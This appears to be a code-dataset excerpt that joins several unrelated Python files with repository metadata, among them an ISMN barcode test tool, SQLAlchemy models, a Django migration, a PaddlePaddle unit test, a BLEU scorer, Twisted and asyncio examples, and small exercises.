assert str(ISMN('ISMN 979-0-321-76546-7')) == 'ISMN M-3217-6546-7'
assert str(ISMN('ISMN 979-0-321-76547-4')) == 'ISMN M-3217-6547-4'
assert str(ISMN('ISMN 979-0-321-76548-1')) == 'ISMN M-3217-6548-1'
assert str(ISMN('ISMN 979-0-321-76549-8')) == 'ISMN M-3217-6549-8'
assert str(ISMN('ISMN 979-0-321-76550-4')) == 'ISMN M-3217-6550-4'
assert str(ISMN('ISMN 979-0-321-76551-1')) == 'ISMN M-3217-6551-1'
assert str(ISMN('ISMN 979-0-345-12345-8')) == 'ISMN M-3451-2345-8'
assert str(ISMN('International Standard Music Number 979-0-345-12345-8')) == 'ISMN M-3451-2345-8'
assert str(ISMN('International Standard Music Number M-345-12345-8')) == 'ISMN M-3451-2345-8'
assert str(ISMN('9790345123458')) == 'ISMN M-3451-2345-8'
assert ISMN('ISMN 979 0 123 45678 5').__str__(short = True) == 'M123456785'
assert ISMN('ISMN 979-0-123-45678-5').__str__(short = True) == 'M123456785'
assert ISMN('ISMN 979 0 299102349').__str__(short = True) == 'M299102349'
assert ISMN('ISMN 9790299102349').__str__(short = True) == 'M299102349'
assert ISMN('ISMN 979-0-321-76543-6').__str__(short = True) == 'M321765436'
assert ISMN('ISMN 979-0-321-76544-3').__str__(short = True) == 'M321765443'
assert ISMN('ISMN 979-0-321-76545-0').__str__(short = True) == 'M321765450'
assert ISMN('ISMN 979-0-321-76546-7').__str__(short = True) == 'M321765467'
assert ISMN('ISMN 979-0-321-76547-4').__str__(short = True) == 'M321765474'
assert ISMN('ISMN 979-0-321-76548-1').__str__(short = True) == 'M321765481'
assert ISMN('ISMN 979-0-321-76549-8').__str__(short = True) == 'M321765498'
assert ISMN('ISMN 979-0-321-76550-4').__str__(short = True) == 'M321765504'
assert ISMN('ISMN 979-0-321-76551-1').__str__(short = True) == 'M321765511'
assert ISMN('ISMN 979-0-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('International Standard Music Number M-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('International Standard Music Number 979-0-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('9790345123458').__str__(short = True) == 'M345123458'
pass
def main(progname, infile = '-'):
infile = (infile == '-') and sys.stdin or (type(infile) in (type(''), type(u'')) and file(infile) or infile)
errors = 0
while True:
line = infile.readline()
if not line: break
line = line.strip()
if line:
public = True
if line[:len('[private]')] == '[private]':
line = line[len('[private]'):].strip()
public = False
pass
i = None
prev = None
for c in UPC8, ISBN, ISMN, ISSN, EAN8, UPC12, EAN13, EAN14, GTIN:
try:
try: i = c(line, public = public)
except: i = c(line)
pass
except:
try: j = c(line, autocorrect = True)
except:
try: j = c(line, autocorrect = True, public = False)
except: pass
else: print 'Perhaps you meant [private] %s?' % j
pass
else: print 'Perhaps you meant %s?' % j
else:
if prev is not None and prev == i:
print '==', `i`
print ' printed form =', str(i)
print ' short form =', i.__str__(short = True)
continue
if prev is not None: print '*** DIFFERS (AMBIGUOUS INPUT) ***' + '\n' + '!=',
print `i`
prev = i
print ' printed form =', str(i)
print ' short form =', i.__str__(short = True)
print ' public =', i.public
print ' gtin =', i.gtin
print ' gtin check digit =', i.gtincheck
print ' info =', `i.info`
print ' pack =', `i.pack`
print ' GTIN =', GTIN(i, public = public)
try: print ' ISSN = %s' % ISSN(i)
except: pass
try: print ' ISBN = %s' % ISBN(i)
except: pass
try: print ' ISMN = %s' % ISMN(i)
except: pass
try: print ' UPC E/UPC-8 = %s' % UPC8(i)
except: pass
try: print ' UPC A/UPC-12 = %s' % UPC12(i)
except: pass
try: print ' EAN-8 = %s' % EAN8(i)
except: pass
try: print ' EAN-13 = %s' % EAN13(i)
except: pass
try: print ' EAN-14 = %s' % EAN14(i)
except: pass
pass
pass
if i is None:
try: GTIN(line)
except Exception, e:
errors += 1
print e
pass
pass
pass
pass
return errors and 1 or 0
test()
if __name__ == '__main__': sys.exit(main(*(sys.argv)))
| [
"[email protected]"
] | |
527f3f6b2e59ae487d07bc1f27334d5ba63a8ff6 | eb2867c8ef92810fb0a76aa5fa9933cfba42d3de | /DL_HomeWork/DL_midterm_codings/u_toronto_csc321_winter2018.py | a2e3d6675c9eead5a172b8b76a40dbf99aa66367 | [] | no_license | thomas-liao/python_prac | 76bbaf988a21cdac8e932a272db8f5eddfc66a7f | 05c68f14c5d7b8bb202ab6dde22e0214b1cd4ee1 | refs/heads/master | 2020-04-23T00:48:33.306497 | 2019-02-27T03:46:40 | 2019-02-27T03:46:40 | 170,792,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | import numpy as np
X = np.arange(15).reshape(5,3)
w = np.zeros((3, 1))
t = np.array([1,2,3,4,5])
t = np.reshape(t, (5, 1))
y_bar = np.dot(X, w) - t
# single: dL/ dw.T = (yi - ti) * xi - > dl / dw = (yi - ti) * xi.T
# multiple - > = y_bar = (np.dot(X, w) - t)
# res = np.dot(X.T, y_bar) / N
w_bar = np.dot(X.T, y_bar) / X.shape[0]
alpha = 0.01
w -= alpha * w_bar
print(w)
b_bar = np.mean(y_bar)
b -= alpha * b_bar
| [
"[email protected]"
] | |
1fb0eac2c32fdf739ca1c6178dcee78561e16153 | 8cba955ce23f98e0a24dc8f8be04e305c4ba59ef | /model.py | 8f523915da7766efb21deaa5bbaee095b8367a84 | [] | no_license | amit20-meet/Y2L-Flask-Routing | 5ba3ae8c9631f18897faf6d7a794355ac9dd907a | 8ddac918a788bd68c065c9976487eb7f589b701a | refs/heads/master | 2020-09-14T17:58:14.881190 | 2019-12-12T14:59:42 | 2019-12-12T14:59:42 | 223,207,600 | 0 | 0 | null | 2019-11-21T15:41:05 | 2019-11-21T15:41:04 | null | UTF-8 | Python | false | false | 512 | py | from sqlalchemy import Column, Integer, String, Date, ForeignKey, Float, Boolean, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Product(Base):
__tablename__ = 'products'
id = Column(Integer, primary_key=True)
name = Column(String)
price = Column(Float)
picture_link = Column(String)
class Cart(Base):
__tablename__ = 'carts'
id= Column(Integer,primary_key=True)
id_cart = Column(Integer)
name_cart = Column(String)
price_cart = Column(Float)
| [
"[email protected]"
] | |
2c5e1e78f81d3c4f9a9b47f685b834307e66f8aa | 7a9f6e01c0450173a0a45bd70816a4be38021eda | /cliente/migrations/0009_auto_20151117_2109.py | a5f6d71b2be3d0455b483d4a777ab7235a44b6d6 | [] | no_license | ryujiin/lovizdigital | 6137726349e6bd1de866054ce37de90f783a3b38 | 9f14c83b976e1e47a2558b508396139145b67bf2 | refs/heads/master | 2021-01-10T03:54:41.460708 | 2016-10-14T02:10:32 | 2016-10-14T02:10:32 | 45,559,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cliente', '0008_auto_20151117_2054'),
]
operations = [
migrations.AlterField(
model_name='comentario',
name='producto',
field=models.ForeignKey(blank=True, to='catalogo.Producto', null=True),
),
]
| [
"[email protected]"
] | |
b682efa36350fb281b200657223293f02c8be285 | d6ca0b326f1bd0ce381c6db611f6331096bf4187 | /examples/example_18_many_runs.py | e04e292092de98147577f3188ad7b98029be7b6e | [
"BSD-3-Clause"
] | permissive | SmokinCaterpillar/pypet | aa35355d70e8f44be015313494376d993f645d80 | 3d454ac65f89e7833baaf89510f73c546e90d8f6 | refs/heads/develop | 2023-08-08T16:01:54.087819 | 2023-02-14T14:59:32 | 2023-02-14T14:59:32 | 12,901,526 | 89 | 22 | BSD-3-Clause | 2023-07-24T00:46:12 | 2013-09-17T17:06:00 | Python | UTF-8 | Python | false | false | 2,415 | py | """Exploring more than 20000 runs may slow down *pypet*.
HDF5 has problems handling nodes with more than 10000 children.
To overcome this problem, simply group your runs into buckets or sets
using the `$set` wildcard.
"""
__author__ = 'Robert Meyer'
import os # To allow file paths working under Windows and Linux
from pypet import Environment
from pypet.utils.explore import cartesian_product
def multiply(traj):
"""Example of a sophisticated simulation that involves multiplying two values."""
z = traj.x * traj.y
# Since we perform many runs we will group results into sets of 1000 each
# using the `$set` wildcard
traj.f_add_result('$set.$.z', z, comment='Result of our simulation '
'sorted into buckets of '
'1000 runs each!')
def main():
# Create an environment that handles running
filename = os.path.join('hdf5','example_18.hdf5')
env = Environment(trajectory='Multiplication',
filename=filename,
file_title='Example_18_Many_Runs',
overwrite_file=True,
comment='Contains many runs',
multiproc=True,
use_pool=True,
freeze_input=True,
ncores=2,
wrap_mode='QUEUE')
# The environment has created a trajectory container for us
traj = env.trajectory
# Add both parameters
traj.f_add_parameter('x', 1, comment='I am the first dimension!')
traj.f_add_parameter('y', 1, comment='I am the second dimension!')
# Explore the parameters with a cartesian product, yielding 2500 runs
traj.f_explore(cartesian_product({'x': range(50), 'y': range(50)}))
# Run the simulation
env.run(multiply)
# Disable logging
env.disable_logging()
# turn auto loading on, since results have not been loaded, yet
traj.v_auto_load = True
# Use the `v_idx` functionality
traj.v_idx = 2042
print('The result of run %d is: ' % traj.v_idx)
# Now we can rely on the wildcards
print(traj.res.crunset.crun.z)
traj.v_idx = -1
# Or we can use the shortcuts `rts_X` (run to set) and `r_X` to get particular results
print('The result of run %d is: ' % 2044)
print(traj.res.rts_2044.r_2044.z)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
1eda218ffa2e3edd8b517b2eb124e9f95f1996c4 | c67831f476cb530fc0c26e0bf4258ce18e986749 | /backend/opsbot/command/argfilter/__init__.py | f929fa7ce2f64581dcd0d1bd5e2a4709dad4ffb0 | [
"MIT"
] | permissive | cz-qq/bk-chatbot | a3ce4b86452b3de0ff35430c1c85b91d6b23a3e6 | da37fb2197142eae32158cdb5c2b658100133fff | refs/heads/master | 2023-06-05T05:48:22.083008 | 2021-06-15T10:21:30 | 2021-06-15T10:21:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from typing import Optional
from opsbot.self_typing import Message_T
class ValidateError(ValueError):
def __init__(self, message: Optional[Message_T] = None):
self.message = message
| [
"[email protected]"
] | |
fc124f8b4453ed0ea2d82b9e548da280ea7e856d | 0cd09f64f7d42f60167c688a959ab1b4eec62caf | /sources/t06/t06ej03.py | 6e6fa34ed09a94cfe12c5ef1749df95a040a47e9 | [
"MIT"
] | permissive | workready/pythonbasic | 3d438250b2fce6b6d243f2a8a1f8c5ccc9734d8c | 59bd82caf99244f5e711124e1f6f4dec8de22141 | refs/heads/master | 2022-10-14T09:20:30.160865 | 2020-06-10T09:22:51 | 2020-06-10T09:22:51 | 270,270,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # Implementamos un constructor para nuestra clase, y dentro del constructor asignamos variables.
class MiClase:
def __init__(self, x, y):
# self.x y self.y son propias de la instancia, no compartidas
self.x = x
self.y = y
c = MiClase(7, 12)
print(c.x, c.y) | [
"[email protected]"
] | |
7a1a3bafcd8974fdc513d298fc7f66943334e152 | 974d04d2ea27b1bba1c01015a98112d2afb78fe5 | /test/legacy_test/test_mv_op.py | 14a4ada5727e896eb87ca2a3359b5f9f4e760a81 | [
"Apache-2.0"
] | permissive | PaddlePaddle/Paddle | b3d2583119082c8e4b74331dacc4d39ed4d7cff0 | 22a11a60e0e3d10a3cf610077a3d9942a6f964cb | refs/heads/develop | 2023-08-17T21:27:30.568889 | 2023-08-17T12:38:22 | 2023-08-17T12:38:22 | 65,711,522 | 20,414 | 5,891 | Apache-2.0 | 2023-09-14T19:20:51 | 2016-08-15T06:59:08 | C++ | UTF-8 | Python | false | false | 3,850 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from eager_op_test import OpTest
import paddle
from paddle.static import Program, program_guard
class TestMVOp(OpTest):
def setUp(self):
self.op_type = "mv"
self.python_api = paddle.mv
self.init_config()
self.inputs = {'X': self.x, 'Vec': self.vec}
self.outputs = {'Out': np.dot(self.x, self.vec)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X', 'Vec'], 'Out')
def init_config(self):
self.x = np.random.random((2, 100)).astype("float64")
self.vec = np.random.random(100).astype("float64")
class TestMVAPI(unittest.TestCase):
def test_dygraph_api_out(self):
paddle.disable_static()
self.x_data = np.random.random((5, 100)).astype("float64")
self.x = paddle.to_tensor(self.x_data)
self.vec_data = np.random.random(100).astype("float64")
self.vec = paddle.to_tensor(self.vec_data)
z = paddle.mv(self.x, self.vec)
np_z = z.numpy()
z_expected = np.array(np.dot(self.x_data, self.vec_data))
np.testing.assert_allclose(np_z, z_expected, rtol=1e-05)
paddle.enable_static()
def test_static_graph(self):
for x_stop_gradient in [False, True]:
for vec_stop_gradient in [False, True]:
paddle.enable_static()
train_program = Program()
startup_program = Program()
self.input_x = np.random.rand(5, 100).astype("float64")
self.input_vec = np.random.rand(100).astype("float64")
with program_guard(train_program, startup_program):
data_x = paddle.static.data(
"x", shape=[5, 100], dtype="float64"
)
data_vec = paddle.static.data(
"vec", shape=[100], dtype="float64"
)
data_x.stop_gradient = x_stop_gradient
data_vec.stop_gradient = vec_stop_gradient
result_vec = paddle.mv(data_x, data_vec)
self.place = paddle.CPUPlace()
exe = paddle.static.Executor(self.place)
(res,) = exe.run(
feed={"x": self.input_x, "vec": self.input_vec},
fetch_list=[result_vec],
)
z_expected = np.array(np.dot(self.input_x, self.input_vec))
np.testing.assert_allclose(res, z_expected, rtol=1e-05)
class TestMVError(unittest.TestCase):
def test_input(self):
def test_shape():
paddle.enable_static()
self.input_x = np.random.rand(5, 100).astype("float64")
self.input_vec = np.random.rand(100).astype("float64")
data_x = paddle.static.data("x", shape=[5, 100], dtype="float64")
data_vec = paddle.static.data(
"vec", shape=[100, 2], dtype="float64"
)
result_vec = paddle.mv(data_x, data_vec)
self.assertRaises(ValueError, test_shape)
if __name__ == '__main__':
paddle.enable_static()
unittest.main()
| [
"[email protected]"
] | |
a80e5a089f37600ba430f6f29761a5e3e3bc6a52 | 4d4c197c49172549514af7845f2429772d0158c7 | /message/migrations/0003_delete_user_account.py | 6a1e9ea6b0bb8c49d85c29853a9aa0745e36b8ee | [] | no_license | vigneshhari/djangolife | 787147ca4195a9a066bf7fdf2f389435afc6cc0b | 1e3b7a6516e1b4fbb98117abec4fa166e6747250 | refs/heads/master | 2021-01-10T02:00:44.300142 | 2017-06-29T02:21:19 | 2017-06-29T02:21:19 | 48,617,422 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('message', '0002_auto_20151206_1835'),
]
operations = [
migrations.DeleteModel(
name='User_Account',
),
]
| [
"[email protected]"
] | |
32ded32756b1b4f4f83fa1014ca01a88bfcc0928 | 1131198c6d53eed5aeacb8af7cfd5e4664f924e5 | /suggestion_baselines/HRED-qs/multi_bleu.py | bc4f5c96ca8b749f2fd68872137f47f4ad8213ed | [
"MIT"
] | permissive | polaris79/mnsrf_ranking_suggestion | d9f2a889e1ccd7f9993594ac212b3a2853f1b7eb | 5bd241fb49f08fa4937539991e12e5a502d5a072 | refs/heads/master | 2020-03-11T23:15:24.019548 | 2018-04-14T16:41:07 | 2018-04-14T16:41:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,302 | py | from functools import reduce
from math import exp, log
from collections import Counter
def ngram_count(words, n):
if n <= len(words):
return Counter(zip(*[words[i:] for i in range(n)]))
return Counter()
def max_count(c1, c2):
return Counter({k: max(c1[k], c2[k]) for k in c1})
def min_count(c1, c2):
return Counter({k: min(c1[k], c2[k]) for k in c1})
def closest_min_length(candidate, references):
l0 = len(candidate)
return min((abs(len(r) - l0), len(r)) for r in references)[1]
def safe_log(n):
if n <= 0:
return -9999999999
return log(n)
def precision_n(candidate, references, n):
ref_max = reduce(max_count, [ngram_count(ref, n) for ref in references])
candidate_ngram_count = ngram_count(candidate, n)
total = sum(candidate_ngram_count.values())
correct = sum(reduce(min_count, (ref_max, candidate_ngram_count)).values())
score = (correct / total) if total else 0
return score, correct, total
def bleu(candidate, references, maxn=4):
precs = [precision_n(candidate, references, n) for n in range(1, maxn + 1)]
bp = exp(1 - closest_min_length(candidate, references) / len(candidate))
return bp * exp(sum(safe_log(precs[n]) for n in range(maxn)) / maxn)
def tokenize(txt):
return txt.strip().split()
def tokenize_lower(txt):
return txt.strip().lower().split()
def multi_bleu(candidates, all_references, tokenize_fn=tokenize, maxn=4):
correct = [0] * maxn
total = [0] * maxn
cand_tot_length = 0
ref_closest_length = 0
for candidate, reference in zip(candidates, all_references):
candidate = tokenize_fn(candidate)
reference = [tokenize_fn(reference)]
cand_tot_length += len(candidate)
ref_closest_length += closest_min_length(candidate, reference)
for n in range(maxn):
sc, cor, tot = precision_n(candidate, reference, n + 1)
correct[n] += cor
total[n] += tot
precisions = [(correct[n] / total[n]) if correct[n] else 0 for n in range(maxn)]
if cand_tot_length < ref_closest_length:
brevity_penalty = exp(1 - ref_closest_length / cand_tot_length)
else:
brevity_penalty = 1
score = 100 * brevity_penalty * exp(
sum(safe_log(precisions[n]) for n in range(maxn)) / maxn)
prec_pc = [100 * p for p in precisions]
return score, prec_pc, brevity_penalty, cand_tot_length, ref_closest_length
def print_multi_bleu(candidates, all_references, tokenize_fn=tokenize, maxn=4):
score, precisions, brevity_penalty, cand_tot_length, ref_closest_length = multi_bleu(candidates, all_references,
tokenize_fn, maxn)
print("BLEU = {:.2f}, {:.1f}/{:.1f}/{:.1f}/{:.1f} "
"(BP={:.3f}, ratio={:.3f}, hyp_len={:d}, ref_len={:d})".format(
score, precisions[0], precisions[1], precisions[2], precisions[3],
brevity_penalty, cand_tot_length / ref_closest_length, cand_tot_length,
ref_closest_length))
if __name__ == "__main__":
candidates = ['my name']
all_references = ['your name']
print_multi_bleu(candidates, all_references)
| [
"[email protected]"
] | |
bf846570cdfda344627ed0134bc3cfe19b69e3b6 | 531be8455556ce2b1e171f71eb040fddd7eb7522 | /Chapter_4_5/gifts_calc.py | 15433eb8c94439a333675850b421dfd031bb4e4f | [] | no_license | tanc7/ACC_410_Tax_Calculator_Project | 8a8f206268b0fb69872d0cc7191e3e69a299dee6 | b6684f8a307f948dee653b7a81457d144866ba11 | refs/heads/master | 2021-01-23T16:19:55.737386 | 2017-07-11T00:32:28 | 2017-07-11T00:32:28 | 93,293,406 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,517 | py | from termcolor import colored
import os
import sys
import socket
import StringIO
import time
import operator
# os.chdir('/root/Documents/ACC_410_Exam_Calculator_Project')
os.chdir('/root/Documents/ACC_410_Exam_Calculator_Project/Chapter_4_5')
def red(string):
string = colored(string,'red',attrs=['bold'])
print string
return string
def green(string):
string = colored(string,'green',attrs=['bold'])
print string
return string
def yellow(string):
string = colored(string,'yellow',attrs=['bold'])
print string
return string
def cyan(string):
string = colored(string,'cyan',attrs=['bold'])
print string
return string
def go_back_main_menu_module():
os.system('python /root/Documents/ACC_410_Exam_Calculator_Project/Chapter_4_5/main.py')
return
def gift_basis_stock():
timestr = time.strftime("%Y%m%d-%H%M%S")
donor_cost = float(raw_input(yellow('Enter the cost of the donor bought stock: ')).replace(',',''))
donor_fmv = float(raw_input(yellow('Enter the FMV of the stock currently, prior to being donated: ')).replace(',',''))
donor_holding_period = float(raw_input(yellow('Enter the holding period in months of the donated stock until the date of donation: ')).replace(',',''))
if donor_fmv < donor_cost:
donee_loss_basis = donor_fmv
donee_gain_basis = donor_cost
donee_holding_period = 'Date of receipt of the gift'
elif donor_fmv > donor_cost:
donee_gain_basis = donor_cost
donee_loss_basis = donor_cost
donee_holding_period = donor_holding_period
string_GAIN_basis = "Recipient's GAIN BASIS: " + str(donee_gain_basis)
green(string_GAIN_basis)
string_LOSS_basis = "Recipient's LOSS BASIS: " + str(donee_loss_basis)
yellow(string_LOSS_basis)
string_HOLDING_period = "Recipient's HOLDING PERIOD: " + str(donee_holding_period)
cyan(string_HOLDING_period)
saved_answer = './solutions/gift_calc_stock' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_GAIN_basis + '\n')
w.write(string_LOSS_basis + '\n')
w.write(string_HOLDING_period + '\n')
w.close()
main()
return
def depreciable_gift_property():
timestr = time.strftime("%Y%m%d-%H%M%S")
donor_basis = float(raw_input(yellow('Enter the DONOR basis in the donated property: ')).replace(',',''))
donor_fmv = float(raw_input(yellow('Enter the DONOR FMV in the donated property: ')).replace(',',''))
donor_useful_life = float(raw_input(yellow('Enter the DONOR remaining USEFUL LIFE in the donated property in YEARS: ')).replace(',',''))
salvage_value = float(raw_input(yellow('Ente the anticipated SALVAGE VALUE if any: ')))
donee_basis = donor_basis
donee_useful_life = donor_useful_life
if donor_basis < donor_fmv:
donee_loss_basis = donor_basis
donee_gain_basis = donor_fmv
elif donor_basis > donor_fmv:
donee_loss_basis = donor_fmv
donee_gain_basis = donor_basis
if salvage_value == '':
salvage_value = 0
elif salvage_value < 0:
red('Error, salvage value cannot be negative')
depreciable_gift_property()
else:
pass
annual_depreciation_straight_line = (donee_basis - salvage_value) / donee_useful_life
years_passed = float(raw_input(yellow('Enter the number of YEARS that have passed: ')))
donee_loss_basis = donee_loss_basis - (annual_depreciation_straight_line * years_passed)
donee_gain_basis = donee_gain_basis - (annual_depreciation_straight_line * years_passed)
if donee_loss_basis <= 0:
donee_loss_basis = 0
if donee_gain_basis <= 0:
donee_gain_basis = 0
string_GAIN_basis = "DONEE'S GAIN BASIS: " + str(donee_gain_basis)
string_LOSS_basis = "DONEE'S LOSS BASIS: " + str(donee_loss_basis)
# string_HOLDING_period = "DONEE'S HOLDING PERIOD: " + str(donee_holding_period)
green(string_GAIN_basis)
red(string_LOSS_basis)
saved_answer = './solutions/depreciable_gift_property_solution' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_GAIN_basis + '\n')
w.write(string_LOSS_basis + '\n')
w.close()
main()
return
def deathbed_gifts(): # this one requires more reading to fully understand
offspring_donor_fmv = float(raw_input(yellow('Enter the FMV from the donor offspring: ')).replace(',',''))
offspring_donor_cost = float(raw_input(yellow('Enter the COST of the donated property to the donor: ')).replace(',',''))
offspring_donor_basis = float(raw_input(yellow('Enter the BASIS of the donated property from the donor: ')).replace(',',''))
donee_elder_time_living = float(raw_input(yellow('Enter the amount of years between when the donee lived and died (while holding the donated property): ')).replace(',',''))
donee_elder_fmv_death = float(raw_input(yellow('Enter the FMV of the property at time of death: ')).replace(',',''))
if 0 < donee_elder_time_living <= 1:
one_year_exception = True
else:
one_year_exception = False
if one_year_exception == True:
offspring_donor_basis = offspring_donor_basis
else:
offspring_donor_basis = donee_elder_fmv_death
improvements_to_property_before_death = float(raw_input(yellow('Enter the amounts of any improvements made to the property by the elder before death (and after receiving the donated property)')).replace(',',''))
if improvements_to_property_before_death == '':
improvements_to_property_before_death = 0
offspring_donor_basis = offspring_donor_basis + improvements_to_property_before_death
string_offspring_basis_after_bequeath = 'NEW BASIS FOR OFFSPRING UPON RECEIVING LAND BACK AFTER DONEE DIED: ' + str(offspring_donor_basis)
green(string_offspring_basis_after_bequeath)
saved_answer = './solutions/deathbed_gifts_solution' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_offspring_basis_after_bequeath + '\n')
w.close()
main()
return
def main():
print """
# 1. Gift basis on stock
# 2. Depreciable gift property
# 3. Deathbed gifts
"""
opt_choice = float(raw_input(yellow('Enter a OPTION: ')))
if opt_choice == 0:
go_back_main_menu_module()
elif opt_choice == 1:
gift_basis_stock()
elif opt_choice == 2:
depreciable_gift_property()
elif opt_choice == 3:
deathbed_gifts()
else:
red('You have entered a invalid option')
main()
return
main()
| [
"[email protected]"
] | |
e774524468621c8b62228ad9b5e4bf70b776f035 | 2c872fedcdc12c89742d10c2f1c821eed0470726 | /pbase/day06/jiangyi/day06/day05_exercise/narcissistic.py | cbe324dd1bb5e88bff78735f37f05917d091fbdb | [] | no_license | zuigehulu/AID1811 | 581c3c7a37df9fa928bc632e4891fc9bafe69201 | 10cab0869875290646a9e5d815ff159d0116990e | refs/heads/master | 2020-04-19T16:33:04.174841 | 2019-01-30T07:58:24 | 2019-01-30T07:58:24 | 168,307,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # 4. 算出 100 ~ 999 范围内的水仙花数(Narcissistic Number)
# 水仙花数是指百位的3次方 + 十位的3次方 + 个位的3次方 等于原
# 数的整数
# 如:
# 153 = 1**3 + 5**3 + 3**3
# 答案:
# 153, 370, ....
# 方法1
# for x in range(100, 1000):
# bai = x // 100 # 百位
# shi = x % 100 // 10 # 十位
# ge = x % 10 # 个数
# if x == bai ** 3 + shi ** 3 + ge ** 3:
# print(x)
# 方法2
# for x in range(100, 1000):
# s = str(x) # 转为字符串
# bai = int(s[0]) # 百位
# shi = int(s[1]) # 十位
# ge = int(s[2]) # 个数
# if x == bai ** 3 + shi ** 3 + ge ** 3:
# print(x)
# 方法3
for bai in range(1, 10):
for shi in range(0, 10):
for ge in range(0, 10):
# print(bai, shi, ge)
x = bai * 100 + shi * 10 + ge
if x == bai ** 3 + shi ** 3 + ge ** 3:
print(x)
| [
"[email protected]"
] | |
54857f8ce1335c730dd6913435514bdd95f0ec4d | 6c1a3dc849b1d84271caad0133387c7001a9704f | /Sep05/client01.py | 9c05f4d7af4e730c40cfc31f06a6225b9e242ab8 | [] | no_license | tnaswin/PythonPractice | f6207a4cf560b45c09af2f82d7365d4f0d16afaf | 8c20fa35bdf65aaf8ec899c217c10ffc7d4d3d64 | refs/heads/master | 2020-06-11T08:53:35.190582 | 2019-06-26T13:41:18 | 2019-06-26T13:41:18 | 193,908,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,149 | py | from __future__ import print_function
from twisted.internet import task
from twisted.internet.defer import Deferred
from twisted.internet.protocol import ClientFactory
from twisted.protocols.basic import LineReceiver
class EchoClient(LineReceiver):
end = "End!"
def connectionMade(self):
self.sendLine("Hello")
self.sendLine("World!")
self.sendLine(self.end)
def lineReceived(self, line):
print("receive:", line)
if line == self.end:
self.transport.loseConnection()
class EchoClientFactory(ClientFactory):
protocol = EchoClient
def __init__(self):
self.done = Deferred()
def clientConnectionFailed(self, connector, reason):
print('connection failed:', reason.getErrorMessage())
self.done.errback(reason)
def clientConnectionLost(self, connector, reason):
print('connection lost:', reason.getErrorMessage())
self.done.callback(None)
def main(reactor):
factory = EchoClientFactory()
reactor.connectTCP('localhost', 8000, factory)
return factory.done
if __name__ == '__main__':
task.react(main)
| [
"[email protected]"
] | |
cf008626688c045892e245b893ca625d48b2fd94 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/__init__.py | 50505e275df54d5aea955fe1884dc157dd81ea47 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | from .url_summary import get_summary, UrlSummaryResult | [
"[email protected]"
] | |
af6a652fa0f874ec7d1a8c91a4a5b77365f67462 | b8085ef607da70023214f105eb27bdbc713e596f | /Day2/Async3.py | 7774674800fd4e6e93ddc3f94d67f879c4b88f34 | [] | no_license | artheadsweden/python_adv_april19 | 893c9ec76e8505a580439b7a2fd7aa2776503c77 | 04eecd25d4a291dddd608d94968b217fed7b88d8 | refs/heads/master | 2020-05-07T13:41:15.545033 | 2019-04-11T18:47:22 | 2019-04-11T18:47:22 | 180,559,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | import asyncio
import random
async def my_other(id):
process_time = random.randint(1, 5)
await asyncio.sleep(process_time)
print(f"Coroutine {id}, has successfully completed after {process_time} seconds")
async def my_coroutine():
tasks = []
for i in range(10):
tasks.append(asyncio.ensure_future(my_other(i)))
await asyncio.gather(*tasks)
print("All done")
def main():
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(my_coroutine())
finally:
loop.close()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
42f186c04422a74342c1a20c27768ff9e674740e | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/Test_001/test_level_20201125190551.py | 1d0a30117b583608aaa4a2ed7178dc99529f1651 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import allure
@
def test_hight():
print("这是一条高级别的测试用例") | [
"[email protected]"
